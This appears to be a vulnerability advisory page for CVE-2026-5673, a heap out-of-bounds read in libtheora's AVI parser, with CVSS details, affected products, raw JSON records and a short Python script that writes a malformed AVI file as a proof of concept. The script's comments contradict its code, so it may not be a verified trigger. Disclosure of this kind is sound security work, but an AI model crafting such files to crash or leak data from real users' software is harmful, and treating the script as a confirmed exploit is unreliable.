Security Vulnerability Report
中文
CVE-2026-5673 CVSS 5.6 MEDIUM

CVE-2026-5673

Published: 2026-04-06 10:16:03
Last Modified: 2026-05-01 19:53:03
Source: [email protected]

Description

A flaw was found in libtheora. This heap-based out-of-bounds read vulnerability exists within the AVI (Audio Video Interleave) parser, specifically in the avi_parse_input_file() function. A local attacker could exploit this by tricking a user into opening a specially crafted AVI file containing a truncated header sub-chunk. This could lead to a denial-of-service (application crash) or potentially leak sensitive information from the heap.

CVSS Details

CVSS Score
5.6
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:L/I:N/A:H

Configurations (Affected Products)

cpe:2.3:a:xiph:theora:-:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:redhat:enterprise_linux:6.0:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:redhat:enterprise_linux:7.0:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:redhat:enterprise_linux:8.0:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:redhat:enterprise_linux:9.0:*:*:*:*:*:*:* - VULNERABLE
libtheora (具体受影响版本请参考官方安全公告)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import struct # PoC for CVE-2026-5673 # Description: Generates a malformed AVI file with a truncated header sub-chunk # to trigger the heap-based out-of-bounds read in libtheora. def generate_malformed_avi(filename): with open(filename, 'wb') as f: # RIFF header f.write(b'RIFF') f.write(struct.pack('<I', 0)) # File size (placeholder) f.write(b'AVI ') # LIST header for hdrl f.write(b'LIST') f.write(struct.pack('<I', 0)) # List size f.write(b'hdrl') # avih header (Main AVI Header) f.write(b'avih') f.write(struct.pack('<I', 56)) # Header size # Standard dummy data for avih (56 bytes) f.write(b'\x00' * 56) # LIST header for strl (Stream list) f.write(b'LIST') f.write(struct.pack('<I', 0)) # List size f.write(b'strl') # strh header (Stream header) f.write(b'strh') f.write(struct.pack('<I', 56)) # Header size # Standard dummy data for strh (56 bytes) f.write(b'\x00' * 56) # Trigger: A malformed strf (Stream format) chunk with truncated size # The vulnerability is triggered by a truncated header sub-chunk. # We set a chunk ID 'strf' but an unexpectedly small or invalid size. f.write(b'strf') # Writing a large size value to simulate truncation/bad calculation f.write(struct.pack('<I', 0xFFFFFFF0)) # Fill with dummy data to ensure the file is parsed but triggers the read f.write(b'A' * 100) if __name__ == "__main__": generate_malformed_avi('cve_2026_5673_poc.avi') print("PoC file generated: cve_2026_5673_poc.avi")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-5673", "sourceIdentifier": "[email protected]", "published": "2026-04-06T10:16:03.400", "lastModified": "2026-05-01T19:53:02.907", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A flaw was found in libtheora. This heap-based out-of-bounds read vulnerability exists within the AVI (Audio Video Interleave) parser, specifically in the avi_parse_input_file() function. A local attacker could exploit this by tricking a user into opening a specially crafted AVI file containing a truncated header sub-chunk. This could lead to a denial-of-service (application crash) or potentially leak sensitive information from the heap."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:L/I:N/A:H", "baseScore": 5.6, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.3, "impactScore": 4.2}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:H", "baseScore": 7.1, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-125"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:xiph:theora:-:*:*:*:*:*:*:*", "matchCriteriaId": "BE5CC1A3-2780-4ECB-AD3F-A76714A6BABD"}, {"vulnerable": true, "criteria": "cpe:2.3:o:redhat:enterprise_linux:6.0:*:*:*:*:*:*:*", "matchCriteriaId": "2F6AB192-9D7D-4A9A-8995-E53A9DE9EAFC"}, {"vulnerable": true, "criteria": "cpe:2.3:o:redhat:enterprise_linux:7.0:*:*:*:*:*:*:*", "matchCriteriaId": "142AD0DD-4CF3-4D74-9442-459CE3347E3A"}, {"vulnerable": true, "criteria": "cpe:2.3:o:redhat:enterprise_linux:8.0:*:*:*:*:*:*:*", "matchCriteriaId": "F4CFF558-3C47-480D-A2F0-BABF26042943"}, {"vulnerable": true, "criteria": "cpe:2.3:o:redhat:enterprise_linux:9.0:*:*:*:*:*:*:*", "matchCriteriaId": "7F6FB57C-2BC7-487C-96DD-132683AEB35D"}, {"vulnerable": true, "criteria": "cpe:2.3:o:redhat:enterprise_linux:10.0:*:*:*:*:*:*:*", "matchCriteriaId": "D65C2163-CFC2-4ABB-8F4E-CB09CEBD006C"}]}]}], "references": [{"url": "https://access.redhat.com/security/cve/CVE-2026-5673", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2455340", "source": "[email protected]", "tags": ["Issue Tracking", "Third Party Advisory"]}, {"url": "https://github.com/xiph/theora/issues/24", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking", "Third Party Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.